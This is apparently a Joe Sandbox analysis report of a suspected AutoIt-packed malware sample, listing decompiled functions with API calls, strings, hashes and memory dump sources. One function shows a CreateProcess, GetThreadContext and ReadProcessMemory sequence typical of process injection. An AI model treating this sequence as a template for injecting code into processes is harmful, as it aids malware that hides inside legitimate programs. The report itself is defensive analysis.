API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 4cc19412294229d28b5b1ffef1516a2a5f8f27f20e334ce7389e84165115f708
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: A7519530A20B1EDBDB249E69C88467EF7A5AF403A0F648739FB35962D0D7709D618F40

Function 002D69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 002D4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,003962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002D4F6F

_free.LIBCMT ref: 0030E68C
_free.LIBCMT ref: 0030E6D3

Part of subcall function 002D6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002D6D0D

Strings

Bad directive syntax error, xrefs: 0030E6BB
>>>AUTOIT SCRIPT<<<, xrefs: 0030E462

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 769f25e6ec922ea9ae7dbc61ff62b746dbbbddd40982bbc2fbe8ec76b862f975
Instruction ID: 17f1143d66f1d23a135e30158decf64b992376a2c58ab09e8e0494ded10fb0ce
Opcode Fuzzy Hash: 769f25e6ec922ea9ae7dbc61ff62b746dbbbddd40982bbc2fbe8ec76b862f975
Instruction Fuzzy Hash: 17916D71A21219EFCF05EFA4CCA19EDB7B8BF15314F14486AE815AB2A1EB319D14CF50

Function 002D35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002D35A1,SwapMouseButtons,00000004,?), ref: 002D35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,002D35A1,SwapMouseButtons,00000004,?,?,?,?,002D2754), ref: 002D35F5
RegCloseKey.KERNELBASE(00000000,?,?,002D35A1,SwapMouseButtons,00000004,?,?,?,?,002D2754), ref: 002D3617

Strings

Control Panel\Mouse, xrefs: 002D35D2

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 47e3f570eec3087d5c35c2c0b0948b516e655b4c17b0ca60f30381e894583669
Instruction ID: f677d31405c82d4684acb946d813edff1c7d2dc0ab58cdbe1b4ecdbefc68a0b7
Opcode Fuzzy Hash: 47e3f570eec3087d5c35c2c0b0948b516e655b4c17b0ca60f30381e894583669
Instruction Fuzzy Hash: 51113675920208BEDB21DF64DC40EAAB7ACEF04740F00846AA805D7210D271DE6097A5

Function 018F12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018F1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018F1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018F1B13

Memory Dump Source

Source File: 00000000.00000002.1661604968.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_6ddrUd6iQo.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction ID: 9eb5d1716ba00d66835de156ff44840fd6137292118c05b0d76b515f54679898
Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction Fuzzy Hash: 34621A30A14258DBEB24DFA4C854BDEB372EF58700F1091A9D20DEB394E7799E81CB59

Function 003397E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 002D5045: _fseek.LIBCMT ref: 002D505D

Part of subcall function 003399BE: _wcscmp.LIBCMT ref: 00339AAE
Part of subcall function 003399BE: _wcscmp.LIBCMT ref: 00339AC1

_free.LIBCMT ref: 0033992C
_free.LIBCMT ref: 00339933
_free.LIBCMT ref: 0033999E

Part of subcall function 002F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,002F9C64), ref: 002F2FA9
Part of subcall function 002F2F95: GetLastError.KERNEL32(00000000,?,002F9C64), ref: 002F2FBB

_free.LIBCMT ref: 003399A6

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
Instruction ID: fb1e9f2ef7c14f37210f27018e0fe21dfb476dab21ceed9f1935689dd52f4daa
Opcode Fuzzy Hash: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
Instruction Fuzzy Hash: 5A5150B1914268EFDF249F64CC81BAEBBB9EF48310F0004AEB209A7241DB715D90CF58

Function 002F493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002F49D0
__flush.LIBCMT ref: 002F49F0
__write.LIBCMT ref: 002F4A23
__flsbuf.LIBCMT ref: 002F4A51

Part of subcall function 002F8D68: __getptd_noexit.LIBCMT ref: 002F8D68

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: f98d9fdfb1f366185c8961f052dff9ee62f58d02421b76672f32c6954aebccee
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 0C41C77072060E9BDB18AE69C8A097FF7A9EF803E0B14813DEA55C7650D7F09D608B44

Function 002D4DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002D4E1A

Strings

EA06, xrefs: 0030DCF5
AU3!P/6, xrefs: 002D4E14

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/6$EA06
API String ID: 4104443479-2288769048
Opcode ID: f901a9e02079a83b003409e6276defb7a3c4795376b34ec6d498c5586501d5fa
Instruction ID: e23100d299e52c9693f5490fd304a7edc79bf16e2337aa2231f4c34ca518a536
Opcode Fuzzy Hash: f901a9e02079a83b003409e6276defb7a3c4795376b34ec6d498c5586501d5fa
Instruction Fuzzy Hash: C1416071A241547BDF226F6488917BE7FA5AF45300F584077EC42DB386C6B19D608BE1

Function 002D73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0030EE62
7523D0D0.COMDLG32(?), ref: 0030EEAC

Part of subcall function 002D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002D48A1,?,?,002D37C0,?), ref: 002D48CE

Part of subcall function 002F09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002F09F4

Strings

X, xrefs: 0030EE7A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: NamePath$7523FullLong_memset
String ID: X
API String ID: 3285060876-3081909835
Opcode ID: 1cf6d7c553551ac3bebef077e9b95ab2c2d999781e23c620a6a1b135cad815e5
Instruction ID: f4924176958dce1c891b87182881b76e18a5affad926600c79547ebe7324becb
Opcode Fuzzy Hash: 1cf6d7c553551ac3bebef077e9b95ab2c2d999781e23c620a6a1b135cad815e5
Instruction Fuzzy Hash: 3C21D130A202589BCB02EF94C845BEE7BF89F48300F04405BE508E7381DBB85999CFA1

Function 0033901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00339036
__fread_nolock.LIBCMT ref: 0033904B

Strings

EA06, xrefs: 0033907D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 7661d0c0c2a3bb92672f42876afa3b72625f4896ea13e922e79eea8e86bdbcc2
Instruction ID: 3f37d6c41730a170f010ff53d8fd02f1894a59731e81d8c184835220d11f5cc5
Opcode Fuzzy Hash: 7661d0c0c2a3bb92672f42876afa3b72625f4896ea13e922e79eea8e86bdbcc2
Instruction Fuzzy Hash: 7301F971814218AEDB29C6A8C856FFEBBFC9B01351F00419FF652D2181E5B5A6148B60

Function 002F0FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 002F594C: __FF_MSGBANNER.LIBCMT ref: 002F5963
Part of subcall function 002F594C: __NMSG_WRITE.LIBCMT ref: 002F596A
Part of subcall function 002F594C: RtlAllocateHeap.NTDLL(01930000,00000000,00000001), ref: 002F598F

std::exception::exception.LIBCMT ref: 002F102C
__CxxThrowException@8.LIBCMT ref: 002F1041

Part of subcall function 002F87DB: RaiseException.KERNEL32(?,?,00000000,0038BAF8,?,00000001,?,?,?,002F1046,00000000,0038BAF8,002D9FEC,00000001), ref: 002F8830

Strings

bad allocation, xrefs: 002F1021

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: bd6e9df21116a4f57fc03420df0b5d83f62bd454fdbe74568175397d9156460b
Instruction ID: 166218575c76fadc37e83d46aa4766114b868d6cb3873f92215e31db434c13ce
Opcode Fuzzy Hash: bd6e9df21116a4f57fc03420df0b5d83f62bd454fdbe74568175397d9156460b
Instruction Fuzzy Hash: 23F0F93951021DA6CB21BA55DC019FFF7AC9F003D0F504039FE0491581EFB08AB08AD0

Function 00339B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00339B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00339B99

Strings

aut, xrefs: 00339B93

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 570e2685fb958c22964fabfcd49e9c0fdafcf3918551128fdb041d3bde715785
Instruction ID: 2d1bc5ab9a576cc0f5a7b4b75aced6c50d9ce0b1fb901a82d023eef4ba731fba
Opcode Fuzzy Hash: 570e2685fb958c22964fabfcd49e9c0fdafcf3918551128fdb041d3bde715785
Instruction Fuzzy Hash: 7FD05EB954030DAFDB11AB90DC0EFEA772CE704701F0046A1BE54961A1DEB055988B92

Function 0034CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b291e02497c1ca769c2e78c0fd81248b23c7e5c963cc7d7dea37d1ad3bc815
Instruction ID: 94a104a55658eccbd17f5fc7298b2c8c0ca0237fddd56d094817578720e95f42
Opcode Fuzzy Hash: c3b291e02497c1ca769c2e78c0fd81248b23c7e5c963cc7d7dea37d1ad3bc815
Instruction Fuzzy Hash: EAF13671A083419FCB15DF28C480A6ABBE5FF88314F14892EF89A9B351D771E945CF82

Function 002D43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002D4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 002D44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 002D44C3

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 5ec2eda53ee8491e698da42db712603d4cfaba74c90454c47151df8381aef405
Instruction ID: e950bba49c0423a971562027d571b19dd55ebdc8f4d5987193ce03c6b8c6f20f
Opcode Fuzzy Hash: 5ec2eda53ee8491e698da42db712603d4cfaba74c90454c47151df8381aef405
Instruction Fuzzy Hash: 48315EB05157018FD721EF24D88569BBBE8BB48308F00092FE5DA83391D7B6A994CB92

Function 002F594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 002F5963

Part of subcall function 002FA3AB: __NMSG_WRITE.LIBCMT ref: 002FA3D2
Part of subcall function 002FA3AB: __NMSG_WRITE.LIBCMT ref: 002FA3DC

__NMSG_WRITE.LIBCMT ref: 002F596A

Part of subcall function 002FA408: GetModuleFileNameW.KERNEL32(00000000,003943BA,00000104,00000000,00000001,00000000), ref: 002FA49A
Part of subcall function 002FA408: ___crtMessageBoxW.LIBCMT ref: 002FA548

Part of subcall function 002F32DF: ___crtCorExitProcess.LIBCMT ref: 002F32E5
Part of subcall function 002F32DF: ExitProcess.KERNEL32 ref: 002F32EE

Part of subcall function 002F8D68: __getptd_noexit.LIBCMT ref: 002F8D68

RtlAllocateHeap.NTDLL(01930000,00000000,00000001), ref: 002F598F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3e20ea64149659e296a7547f0a245cd0fca619ecd452f95512830b3133070b81
Instruction ID: c0a74659a8bad276e42b42206b72190d8d1725bcc79902b73e61c44124bcac1f
Opcode Fuzzy Hash: 3e20ea64149659e296a7547f0a245cd0fca619ecd452f95512830b3133070b81
Instruction Fuzzy Hash: FB01D631330B2EDED6296B34D842A3DF3889F417F1F50003AF705961C1DAF19D214AA0

Function 00339B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003397D2,?,?,?,?,?,00000004), ref: 00339B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003397D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00339B5B
CloseHandle.KERNEL32(00000000,?,003397D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00339B62

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 143150f663c88dbd011fb01c7c4eaca37631fcf9067a0b4f4811c039a9370bd6
Instruction ID: 596a51aad12e2724b24f6f5ff9c6c630d2d612add9cb58963cf60005ee293c66
Opcode Fuzzy Hash: 143150f663c88dbd011fb01c7c4eaca37631fcf9067a0b4f4811c039a9370bd6
Instruction Fuzzy Hash: F7E08632181714FBEB232B54EC09FDA7B1CAB05762F114120FB14A90F087B126119798

Function 00338F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00338FA5

Part of subcall function 002F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,002F9C64), ref: 002F2FA9
Part of subcall function 002F2F95: GetLastError.KERNEL32(00000000,?,002F9C64), ref: 002F2FBB

_free.LIBCMT ref: 00338FB6
_free.LIBCMT ref: 00338FC8

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
Instruction ID: be06a25e53987a05973640f2a0ebc70665feeb2d5b3ec004919b0b2bbdc33f89
Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
Instruction Fuzzy Hash: 2AE0C2B12287008ACA20A638BD80AA3A7FE0F48390B09082DB509EB142CE24E8508824

Function 002DAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0031002B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
